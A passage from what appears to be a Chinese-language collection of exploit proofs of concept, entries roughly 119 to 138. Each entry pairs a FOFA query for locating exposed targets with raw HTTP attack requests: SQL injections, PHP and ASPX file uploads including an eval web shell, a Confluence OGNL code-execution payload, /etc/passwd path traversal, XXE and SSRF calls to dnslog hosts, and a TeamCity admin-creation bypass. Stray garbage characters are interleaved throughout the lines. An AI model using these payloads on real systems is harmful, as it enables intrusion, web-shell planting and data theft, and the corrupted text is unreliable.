' D$ Q% c. A) H* \/ I$ [) JReferer: https://58.18.133.60:8443/sysmanage/manageadmin.php$ k" z* X1 e5 r( d
Sec-Fetch-Dest: empty
) a2 E1 b9 L. T3 }+ B4 v$ WSec-Fetch-Mode: cors
4 V' u7 u+ }" l gSec-Fetch-Site: same-origin+ n5 Z! A3 U% T4 o5 S; _' h9 m
X-Forwarded-For: 1.1.1.13 h( M0 G ]$ l& N: e
X-Originating-Ip: 1.1.1.1
" W3 Z# ^/ |' V- J0 gX-Remote-Ip: 1.1.1.1) D* C4 p3 S" [0 `( u1 S
X-Remote-Addr: 1.1.1.1$ n3 U* J6 T0 \- R. Z! b" _# N
Te: trailers
( _3 Y& H2 W* R" L; }Connection: close4 c$ }9 r, ~# {
- p0 j: N) T4 A: u4 j7 p& H/ C$ |
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456+ x% O% @1 i9 B! N0 R3 a2 {+ A* A
9 c' t3 O( f* a: A# K. n
1 s% b6 c5 J, Q- c
120. 北京百绰智能S40管理平台导入web.php任意文件上传
7 g" a( i4 j/ d0 E% r yCVE-2024-1253
% s. ?$ z9 F. u$ f4 d }5 W! @, D- AFOFA:title="Smart管理平台"
8 p3 _& w1 r" f! X lPOST /useratte/web.php? HTTP/1.12 Y6 n. I7 N5 [7 H9 @5 }
Host: ip:port
$ r' ?' `+ L* w8 [1 @8 LCookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
$ L' A, _, Q4 b( XUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
: W0 m7 [- f) i& ~5 X: JAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 P3 f. o; m- B% o
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% N2 F; y7 B8 S- W8 S9 u5 v. R
Accept-Encoding: gzip, deflate; e2 S5 R1 L0 Y& d, ^- t
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
7 |& W# H6 y5 O, b& t2 xContent-Length: 597
$ i( A$ ~; c8 v$ n( iOrigin: https://ip:port
* q7 \/ f% p$ k: A0 rReferer: https://ip:port/sysmanage/licence.php6 [" O6 A6 g3 X) d
Upgrade-Insecure-Requests: 1' b6 S. R; h2 Q6 [: S8 N% G: C
Sec-Fetch-Dest: document
5 q7 C8 b) p# C& t" t" rSec-Fetch-Mode: navigate8 |8 v& T' N' T7 `- ] s
Sec-Fetch-Site: same-origin
0 _! O9 A$ L7 j8 o* tSec-Fetch-User: ?1% }: ]4 G1 k# @& P2 {- X- R2 J
Te: trailers
; S+ V( z: e {. fConnection: close% j: ^# Y4 k7 n
& V/ G4 F0 ]0 J; K8 L
-----------------------------42328904123665875270630079328* U6 L k7 X' C6 _* T
Content-Disposition: form-data; name="file_upload"; filename="2.php"
; V) N' ~9 {8 v# b0 y- EContent-Type: application/octet-stream
0 W% J3 N) l) x' O, N) `5 \6 t: L# t# q( e' \" Y+ w K4 U2 j
<?php phpinfo()?>
4 T) ]+ }4 X6 u* w' r4 F, a/ v-----------------------------42328904123665875270630079328
; W' z$ c$ f7 j) |$ gContent-Disposition: form-data; name="id_type"4 z7 _6 e' c- S; E1 {
8 K% L* [/ K+ `1
3 T4 B% r$ c( f0 X$ e-----------------------------42328904123665875270630079328
! Z' o; |. l- X: k4 A, O1 R$ r& AContent-Disposition: form-data; name="1_ck"
B& N5 x6 k+ O" q# G; e3 o) B: o2 I+ k1 ]3 d
1_radhttp
; x* b% U. n* M5 j3 I0 O-----------------------------42328904123665875270630079328- V" K5 {2 {7 Q% S% m' s
Content-Disposition: form-data; name="mode" V' g8 W: u& g8 A
! [; W' B' k" U+ aimport9 R! k: q- q0 l! e- E
-----------------------------42328904123665875270630079328/ ~; ?8 y4 }0 P$ S/ ~
; t3 T, `5 [7 t1 L- t- U
9 s( R, v- d5 D% H
文件路径/upload/2.php
. Y) |/ f1 j. P; f
, r( W" C" C3 c121. 北京百绰智能S42管理平台userattestation.php任意文件上传3 C0 F, v$ Q: g0 T: h
CVE-2024-1918% V$ [ [+ z6 M% s& [! g
FOFA:title="Smart管理平台"6 x( X& s5 F; m5 f* A% D
POST /useratte/userattestation.php HTTP/1.1( y- ~' v/ v' A4 u' G3 z
Host: 192.168.40.130:84431 x4 G- m- `/ C
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
0 d4 N: t7 d9 {User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
% p8 I$ _) x$ q( F* EAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8, P# o- B- j; m
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% Z: Y2 b5 d, {8 u B
Accept-Encoding: gzip, deflate
4 U0 n1 D6 Y0 T: x, z' _Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328) G2 ^! F6 S; t) l" ]6 _5 \* Q
Content-Length: 592
3 k# u+ c) v; @) C4 C5 g3 ]Origin: https://192.168.40.130:8443
# {. |- h. @; e+ k' a% wUpgrade-Insecure-Requests: 1
0 u: |+ D2 ?' G7 X+ fSec-Fetch-Dest: document
2 G' H" `, l9 f; K4 s( z" _/ h& FSec-Fetch-Mode: navigate9 Y3 u# Y" l: h
Sec-Fetch-Site: same-origin* ]) J; P( Y1 ]* {/ v, Q* D* }
Sec-Fetch-User: ?1 ~7 U6 d. ^# }
Te: trailers
$ y: u$ R8 K3 m& F5 U* A( CConnection: close; n0 H; t+ k& F9 U, p
9 D |! r6 D, f6 _8 m
-----------------------------423289041236658752706300793289 v) M$ _: V- g) ]3 A2 C: t
Content-Disposition: form-data; name="web_img"; filename="1.php"
/ T% Z0 u, A+ }Content-Type: application/octet-stream
7 r \; {+ Y6 O2 J
2 O6 r% ?2 [4 E! ]+ j6 [<?php phpinfo();?>
1 t' L) k4 M( y$ L" ]8 r! j-----------------------------42328904123665875270630079328
; v! X7 O- S4 w% T1 X* a2 |Content-Disposition: form-data; name="id_type"
, |' V/ h8 P, N9 V& g! O
! T- C7 ?" u, y) H; f% K9 g7 I19 D: K, ~+ b3 I- Y
-----------------------------42328904123665875270630079328
% |; |" f a( Q0 s4 lContent-Disposition: form-data; name="1_ck"
. T- {& S/ M. K' Z' h
1 [) R( g+ ]' V0 _/ e6 N1_radhttp* |! n- I! d: e* |1 f6 j
-----------------------------423289041236658752706300793287 \. _% k( k, s# R4 m) |
Content-Disposition: form-data; name="hidwel"0 s s5 a% n/ ~. V3 ^
j) x- M* y7 J* S, m5 c
set
! m3 Z1 W+ X" k3 {! a-----------------------------42328904123665875270630079328" L2 m8 U% y9 \
9 D# Y: t- c8 n' a: s, r$ M1 B/ ` ?
H# ~6 O J0 M( h; W, I7 }6 c, kboot/web/upload/weblogo/1.php# {% @9 n6 a( s
# ^; t4 h3 X. P( f; E7 X5 p
122. 北京百绰智能s200管理平台/importexport.php sql注入$ T" s% t) G3 w0 E0 W7 \
CVE-2024-27718FOFA:title="Smart管理平台"- H5 ~ H" G; W! G7 t5 _
其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()
% G/ i/ S4 T7 v* O$ cGET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
9 Q+ i1 b" ^ S* V& _, aHost: x.x.x.x
8 _( c. q4 U, ~7 K6 x, n$ FCookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0; o2 \9 x( G) o3 O }' p) D+ p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0" r1 G' X6 U( ^$ k1 v' p
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.83 o4 t% q" ?. c2 [5 ~$ ? ~
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2: V9 x3 s: o2 K. A5 P
Accept-Encoding: gzip, deflate, br! d$ m+ x5 X, r! p
Upgrade-Insecure-Requests: 16 O' {7 u* q1 J5 ?
Sec-Fetch-Dest: document
3 \: e9 ~7 e" K* b( oSec-Fetch-Mode: navigate
! q9 M) G# ~& _6 rSec-Fetch-Site: none
6 ^4 r+ q3 w7 u- S8 G4 E0 zSec-Fetch-User: ?19 \7 [4 G; R5 Q. F. E8 X3 v4 v6 L
Te: trailers. n9 T6 m0 V* x* i. L: t3 e3 h
Connection: close$ O9 j) Y- w5 K% ^$ y K+ U( x" w
4 `7 x1 A$ U9 T7 c1 a
$ S, D7 E1 K( j+ e( H+ f# ^ E; w5 G123. Atlassian Confluence 模板注入代码执行
6 F1 Q; y9 G% R# |# C t/ [FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
. z3 b& K$ b6 r/ i0 g% iPOST /template/aui/text-inline.vm HTTP/1.1
; _. ]$ D5 P* j. Y0 @% K% W' nHost: localhost:8090
- ^- |( L$ v+ n: l1 zAccept-Encoding: gzip, deflate, br3 g( H ^$ o& ~# d- _
Accept: */*
9 H: S9 {: M; L$ l& k! f5 M" MAccept-Language: en-US;q=0.9,en;q=0.8
7 c, H* l: F/ gUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
7 I& d6 i: N# r6 tConnection: close% }$ a8 d6 ~* @* ?- ]- k; ?4 X- K
Content-Type: application/x-www-form-urlencoded+ y9 S2 Y% H( i4 J8 o; [
2 a/ @- _# {" v% c+ E
label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))* |( L: h7 c2 B9 M; x. d. |( ^
# Z1 w# T+ M& g
5 b. [% Q8 N* J5 G5 w- O
124. 湖南建研工程质量检测系统任意文件上传& w* @+ M4 j6 Q1 {; ^( p
FOFA:body="/Content/Theme/Standard/webSite/login.css"; S5 {4 P. T& l. Z' j8 S: q) A0 |
POST /Scripts/admintool?type=updatefile HTTP/1.1
4 O& _( ?, D. K' m6 wHost: 192.168.40.130:8282
6 m8 r6 D/ d P5 E8 [0 D% `% vUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
- \ X y- w3 o& t- t! AContent-Length: 72
0 p9 M. F" Y- l6 G7 y$ @. BAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.89 z+ t6 i0 O1 K% D* m( f- W: D4 J
Accept-Encoding: gzip, deflate, br3 d8 r7 U* E# J+ T
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 R! i8 F- G. e+ N& I6 ^/ i: b. \Connection: close' p+ T, U3 |/ o) t& ^3 Z
Content-Type: application/x-www-form-urlencoded
% C, ]4 d8 J/ a1 w6 b* s4 H. z. ]$ z' s2 `# ?$ g. ?
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
* Z* T6 p* w8 ^4 R% y% |0 z# c
* e* b7 r$ W7 ^, Q) m9 |
$ ^( d) p& T( f5 W2 Dhttp://192.168.40.130:8282/Scripts/abcgcg.aspx# R$ V. X0 c& A: }
' p4 i0 T; j) ~7 N* D* o, j( W125. ConnectWise ScreenConnect身份验证绕过+ H8 m$ y% y) Y8 A L$ W' `% d$ @
CVE-2024-1709
9 C& w9 K/ B# y6 b( i/ a0 c) X F% EFOFA:icon_hash="-82958153"
$ Y# U& \3 M& k; Mhttps://github.com/watchtowrlabs ... bypass-add-user-poc) W6 g3 J& Y. B @4 L
1 a6 ]! |. ?7 _# E% V+ A1 b
8 C7 W3 W x9 ~% q! q* q& i
使用方法
. N( l! P- {* R3 Z! bpython watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!+ F/ F0 Q/ ^0 B% V
: {7 W7 I3 \- h/ \6 b, \
" ?2 o7 W5 R" W2 ]5 C
创建好用户后直接登录后台,可以执行系统命令。* c0 d2 Y4 t' U3 t
+ [ D. P) W4 G% F! y7 i( G
126. Aiohttp 路径遍历1 m5 V7 }) }* N* Z; S0 R* X* f8 u
FOFA:title=="ComfyUI"* T$ g5 r" n: ~# C+ T
GET /static/../../../../../etc/passwd HTTP/1.1
0 R0 d: [3 G" O: D8 E3 ZHost: x.x.x.x' M" a2 ]# `5 [( p% o! L( E
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36$ j7 K3 G/ }" _- B
Connection: close9 |2 U2 }$ g# x9 M9 l4 W/ {; M. F
Accept: */*4 R; O2 N7 @1 d9 v' a- i9 g" g/ S9 x
Accept-Language: en% p: Q( o) e0 ^0 B+ \
Accept-Encoding: gzip6 |% i# |9 x* |; y
F: c, \+ X& h4 I. M: V) |8 n9 p
/ c8 d3 k" s+ d# P- M127. 广联达Linkworks DataExchange.ashx XXE# L7 h2 p; G& l( C# `3 C! l& \
FOFA:body="Services/Identification/login.ashx" 3 L1 E. W' e6 r* }8 ?. B
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
- @. j% x) Z$ R i+ V3 wHost: 192.168.40.130:8888& a4 O) h7 F& A! l" D7 h2 K6 @/ z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
' V5 `6 W3 N- h/ f: G+ tContent-Length: 415" x- q6 D s; `- j( U) J
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 a1 z- \. p# Y# c9 A& T1 b1 `
Accept-Encoding: gzip, deflate
9 q' [& ?3 d+ n, \# [Accept-Language: zh-CN,zh;q=0.9 m) F6 C* h0 O8 M a2 {/ K
Connection: close0 s; g* S. }5 i6 i
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
1 v( q6 ]" i% _5 T- _Purpose: prefetch a$ {$ G+ c3 z; D$ E
Sec-Purpose: prefetch;prerender
1 E3 N0 X% |& T9 ~# c7 ~4 x1 L- G8 x9 h# c, S, S
------WebKitFormBoundaryJGgV5l5ta05yAIe0# W- {. ?5 X# O5 F5 R7 Z% [- Z
Content-Disposition: form-data;name="SystemName"
, p, g8 {9 v( a8 V- |
. g/ {. V/ q3 o+ z. e; cBIM
0 S0 Z' v7 w6 Q B; v# k+ x2 m------WebKitFormBoundaryJGgV5l5ta05yAIe02 x) m2 m& S6 O: r0 y- [
Content-Disposition: form-data;name="Params"
8 n+ f9 q$ x8 JContent-Type: text/plain
1 r/ j% d0 v0 c* u( r* N$ \! L. u. J; x5 [4 k
<?xml version="1.0" encoding="UTF-8"?>
" G+ J) a6 [! o<!DOCTYPE test [
: S# Z, K7 X- D* H$ C9 n8 K$ }<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
7 {0 g& n( S* S' @7 C]# k8 O! I" \' l3 m
>) A: u9 l1 {# _% o2 I, g$ S$ ^( H
<test>&t;</test>
8 U% l( e$ a" k$ d9 [! X------WebKitFormBoundaryJGgV5l5ta05yAIe0--" y5 x" J, F) y/ c1 I# P) Q: [
4 N. \! ?+ J I' }- x
; } _/ K: ^& d# i: e1 [$ t: u
128. Adobe ColdFusion 反序列化: | D( V! @: l) H( i
CVE-2023-38203
8 K% M! p8 [5 _ g# G, |. |Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
& L. t3 e8 Y# T' oFOFA:app="Adobe-ColdFusion"+ {% U. d- |1 E }- G- @
PAYLOAD$ G& W* t0 A q$ ^& `+ [
* ~( k/ p, [: D! {: c# K
129. Adobe ColdFusion 任意文件读取% P) H0 Y# L5 O# j
CVE-2024-207674 \ a ]0 e! ~3 ]! M& }+ v
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"0 o. @1 x* Q7 S$ |3 D
第一步,获取uuid
& |" [- S; Q; U. aGET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1! I5 \, q2 p9 b! n
Host: x.x.x.x2 y0 d/ k; W+ k2 w9 _
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
' z, v8 J, I; F6 U4 u3 hAccept: */*
; U7 _' O2 U6 x, KAccept-Encoding: gzip, deflate
$ E0 l. ?1 F' o! i {: FConnection: close5 e' d0 R/ h- l3 R; K7 K& g/ [
, U: T( {7 g$ D& V4 E+ A2 w
Q+ i9 q, F' c6 q7 T a4 ] F第二步,读取/etc/passwd文件; q! `; I+ T, Y6 y- n
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.17 R* X6 v, L5 E* y; z! m5 Z. m
Host: x.x.x.x! t0 k9 {2 c1 u; L& V' r
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
( z3 @. l$ i/ {' s' EAccept: */*
' a( K$ e A# G: mAccept-Encoding: gzip, deflate
% V% D& ^. z! j( B' QConnection: close# t y+ ~ d# q$ Y
uuid: 85f60018-a654-4410-a783-f81cbd5000b98 W% h' q& Z2 C; D- ?9 D$ Z
& H% P9 A3 ?% W4 \/ T4 M
7 ?2 Z) T, }8 t130. Laykefu客服系统任意文件上传# K! Y& ?# W6 ~, a( x
FOFA:icon_hash="-334624619"; g9 _" ]8 D# R7 ~4 t5 z
POST /admin/users/upavatar.html HTTP/1.1, G! {( w, x" d5 S
Host: 127.0.0.1
( i& z% [" e6 S+ {# uAccept: application/json, text/javascript, */*; q=0.01
. G8 }9 e$ _( x' Y' eX-Requested-With: XMLHttpRequest }& x: t. p, L$ O( p
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26' |& |: c- o& B! o7 t
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
6 i4 s- I7 C0 qAccept-Encoding: gzip, deflate
, J# d- A% B; v3 v rAccept-Language: zh-CN,zh;q=0.97 M" |. Z7 S2 s8 N: ~
Cookie: user_name=1; user_id=3
. _3 {( _2 g4 e4 o8 G$ DConnection: close0 ^7 ^' M' N0 p. T
1 i( B5 P3 `8 U/ @( }9 u------WebKitFormBoundary3OCVBiwBVsNuB2kR
, U9 p% s# Q9 I# wContent-Disposition: form-data; name="file"; filename="1.php"1 J) \+ _( l& ?: t* ?
Content-Type: image/png! R" |% C9 W& Q6 `& t
4 t5 h! ]4 |$ ~, v
<?php phpinfo();@eval($_POST['sec']);?>
9 o* ~( F* h0 z- O5 p1 \ e9 k9 O------WebKitFormBoundary3OCVBiwBVsNuB2kR--" S% `" Z( r- O$ s% _
& ]" B+ Z! o, e
; m' T, T" l, f) g/ G
131. Mini-Tmall <=20231017 SQL注入
* @% ?3 I& Q# m1 f- p; u4 kFOFA:icon_hash="-2087517259". n8 l3 X7 u/ q
后台地址:http://localhost:8080/tmall/admin
, Q, `' ?5 K( O; W: `. |http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)& z3 }, R5 y. v2 L, _: r) g
# ~. s* \4 I: X4 A7 V
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过
$ p( O0 E, F( T, z4 nCVE-2024-27198+ M9 n; [9 w5 L( ^, p& I1 `( }. @
FOFA:body="Log in to TeamCity"
/ f& a7 O$ b' J2 r. X" ^3 dPOST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
2 F, @: L! A+ {5 T. [* D+ vHost: 192.168.40.130:8111& t c% B) F9 d0 P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36& O5 _& l/ [' C6 X. x8 E
Accept: */*
8 s: u9 M# Z- p7 f z/ T; p# zContent-Type: application/json3 H/ R% N) Z. b4 C( H: i
Accept-Encoding: gzip, deflate8 G- \" O5 a: W# Z. H0 U3 c
1 }2 O2 x% H5 l* A2 g9 P% [{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}/ _' W M2 d$ x/ D. q! Y5 z
: p- w9 p/ O$ u$ M9 j Y5 J
# O6 S! h$ p1 C
CVE-2024-27199
8 |2 e( o" Q% a* h/ [/res/../admin/diagnostic.jsp Q. T3 R) F6 {! g9 i% m- E
/.well-known/acme-challenge/../../admin/diagnostic.jsp6 w" q6 Z+ B9 r5 F1 j% A# S) g
/update/../admin/diagnostic.jsp
: r% _( z5 y/ i2 o0 Q5 d. f
( `5 a- Z R! @, _% o. b7 y; e" h3 h
CVE-2024-27198-RCE.py
! S o3 p. D6 }! W; k3 J
3 z. W: `; b5 t- {4 `$ c133. H5 云商城 file.php 文件上传
) n! I; r0 _0 d8 \FOFA:body="/public/qbsp.php"
! R1 f1 S. E) Q( M5 x0 A7 D0 ZPOST /admin/commodtiy/file.php?upload=1 HTTP/1.1
) [8 x3 h. F8 a9 f/ _Host: your-ip! @" x$ ?: [ ]- l8 ~4 m
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
7 U( j4 Y ^" |" y# n" QContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx
5 E9 K N2 }+ [4 K* H
4 F' F# j/ _5 t9 p* S9 }" l, Q* i------WebKitFormBoundaryFQqYtrIWb8iBxUCx
( J0 M8 G5 {& I4 SContent-Disposition: form-data; name="file"; filename="rce.php"
% r- }2 o. b) I( i e2 g) L+ OContent-Type: application/octet-stream& e( k/ E' t- Q& E, l
- r1 E' K! \7 }8 M9 g5 @
<?php system("cat /etc/passwd");unlink(__FILE__);?>
& p3 J8 o7 ]# Q0 r. P* _$ y------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
4 o2 \' _8 f' m) q$ @. m b* l3 u1 S
" D0 @. Q7 i% j! `- u
, f! w) b. g0 t/ T+ {134. 网康NS-ASG应用安全网关index.php sql注入
, `3 m9 m, G* K' S, ?CVE-2024-2330
+ n- E, B$ F( ^7 Y7 P- `, dNetentsec NS-ASG Application Security Gateway 6.3版本) f9 S/ p8 D3 u7 [
FOFA:app="网康科技-NS-ASG安全网关"
. ^( S$ \5 m9 |4 ePOST /protocol/index.php HTTP/1.1( f" x q6 \2 k6 E, e; U* ~
Host: x.x.x.x# |2 O- y# X q9 \+ \
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
3 L, `& U% q7 l/ O- ?; k# VUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.01 s8 W: k8 S. {3 v: S9 Q
Accept: */** J( W2 a$ p9 N! t+ r+ E! E! A
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
3 f/ I* @: A7 IAccept-Encoding: gzip, deflate
1 X: p- T$ S& Y% R k. p# \Sec-Fetch-Dest: empty
' Z- }7 x$ o e4 m5 ySec-Fetch-Mode: cors
z( y, I! U9 ]+ f6 I! h% X+ `Sec-Fetch-Site: same-origin
5 a* O: O& r! p8 M, T; @( L" D9 xTe: trailers9 B/ N# _$ N* h1 F( U" s0 Q
Connection: close
r: Y. M3 b* m; U6 I) ?Content-Type: application/x-www-form-urlencoded/ A* L7 k" v/ u8 T2 |9 z, x2 v9 A
Content-Length: 263
D0 K4 i; _5 I' I1 r) Z' y- a" L" ~+ x2 ` W1 h. ]
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}, o5 y4 |2 J0 c) e
# v4 V4 F% q) {" K* C7 b% o) I
! T# G! c. |- ~- |: O, p- m
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
3 O; r3 i0 s. ]) x+ t1 l- }" w+ MCVE-2024-20220 E5 H3 ~" z4 I1 z1 W' e, K) q
Netentsec NS-ASG Application Security Gateway 6.3版本
2 ]9 u; A' b- Z3 ZFOFA:app="网康科技-NS-ASG安全网关": E9 M5 W$ v k* |2 r3 J" Z g
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Y( j! x& Q- O+ `! [; i5 RHost: x.x.x.x
, L- G2 h1 ~7 T0 [1 B2 IUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
: F5 ~% o: d/ P. U/ _. I; n) x# A6 W$ KAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
0 ` |. ~# j8 @1 |Accept-Encoding: gzip, deflate
L& @5 B/ b' r4 `Accept-Language: zh-CN,zh;q=0.9) F8 ^( ?( t# y) h: I5 R, k( e: A
Connection: close1 u& N$ Y1 ~# {8 c6 o
4 h* s6 e+ ^. \, e6 s% g; f" a
( x; \! G2 K; |3 x0 q136. NextChat cors SSRF
5 J5 e, x" s. h3 Y* R& UCVE-2023-49785
! i2 x3 K. k9 B: MFOFA:title="NextChat"
# r8 r- `2 @* fGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
8 G" j" ^! W& X2 K# g) _Host: x.x.x.x:100001 T1 N: s) ~$ V
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
/ ~% r- d: H/ w2 N. EConnection: close
; F1 P" u0 Y$ E% g2 ^, K7 H$ [- ~4 d8 bAccept: */*5 P/ X4 l Y! w
Accept-Language: en: l4 r1 @7 z |
Accept-Encoding: gzip
% D7 \1 P! h5 q$ y% l
- @6 O, K# x( Y' e( f9 A8 m1 @
, d O" u! B! ? ^+ V137. 福建科立迅通信指挥调度平台down_file.php sql注入
9 s# u$ Z- H ]/ ^' h$ F- PCVE-2024-2620
) p: N+ ^/ V1 n+ g0 j. gFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
( @: U& Y+ Y/ X" YGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1+ l# H- Q# L( y
Host: x.x.x.x
0 l( v# j6 j! p0 F% u# i8 b2 RUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0* m' ]: z% T* h5 T
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8) x: l: `7 m- N; \6 c: Q% T3 D
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.29 B( _! e' E3 {2 l
Accept-Encoding: gzip, deflate, br! X7 B; Y, ~$ Q K2 c% P
Connection: close
; v0 e& f. e' l1 c% XCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj+ E7 O1 I# _6 U8 w {
Upgrade-Insecure-Requests: 10 G" z- i' G1 v& O A8 d
* f) \! e8 p% b
$ Q2 C2 o, v# G; t/ _
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入
: k% i3 E- S. t1 |8 fCVE-2024-2621
: r. V2 z% _* w' P2 RFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
; }" R4 Q$ ~- nGET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
, b! c ^+ Q U9 t# j8 O! A; GHost: x.x.x.x* f- S' ]" J9 h8 C: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0* ]& A* w N8 Y: `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
+ f0 n f2 X3 I# ?5 F6 DAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 _5 [ U' F7 n" [
Accept-Encoding: gzip, deflate, br
7 {- v3 |) G5 K' A# d# u' IConnection: close
